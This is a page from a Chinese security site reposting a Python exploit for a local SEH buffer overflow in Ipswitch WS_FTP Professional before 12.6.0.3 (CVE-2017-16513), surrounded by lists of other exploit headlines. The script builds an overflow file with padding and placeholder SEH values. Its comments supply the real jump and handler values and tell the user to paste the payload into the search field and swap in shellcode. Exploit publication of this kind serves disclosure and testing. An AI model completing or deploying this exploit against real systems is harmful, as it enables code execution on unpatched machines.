首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ipswitch WS_FTP Professional < 12.6.0.3 - Local Buffer Overflow (SEH)
来源:https://www.7elements.co.uk 作者:McGuigan 发布时间:2017-11-07  
#!/usr/bin/python
#Title: Ipswitch WS_FTP Professional Local Buffer Overflow (SEH)
#Author: Kevin McGuigan. Twitter: @_h3xagram
#Author Website: https://www.7elements.co.uk
#Vendor Website: https://www.ipswitch.com
#Date: 03/11/2017
#Version: 12.6.03
#CVE: CVE-2017-16513
#Tested on: Windows 7 32-bit
#Use script to generate payload. Paste payload into search field, replace Ds with shellcode.
#nSEH = "\x74\x08\x90\x90"
#SEH = "\x31\x2D\x91\x23"
 
buffer = "A" * 840
nSEH = "B" * 4
SEH = "C" * 4
 
 
f = open ("poc.txt", "w")
f.write(buffer + nSEH + SEH + "D" * 200)
f.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Avaya IP Office (IPO) 10.1 Sof
·Debut Embedded httpd 1.20 - De
·Avaya IP Office (IPO) 10.1 Act
·SMPlayer 17.11.0 - '.m3u' Buff
·WordPress WP Mobile Detector 3
·Linux Kernel 4.13 (Ubuntu 17.1
·tnftp - 'savefile' Arbitrary C
·CoolPlayer+ Portable 2.19.6 St
·GraphicsMagick - Memory Disclo
·FreeFloat FTP Server 1.0 HOST
·Oracle PeopleSoft Enterprise P
·IBM Lotus Notes Denial Of Serv
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved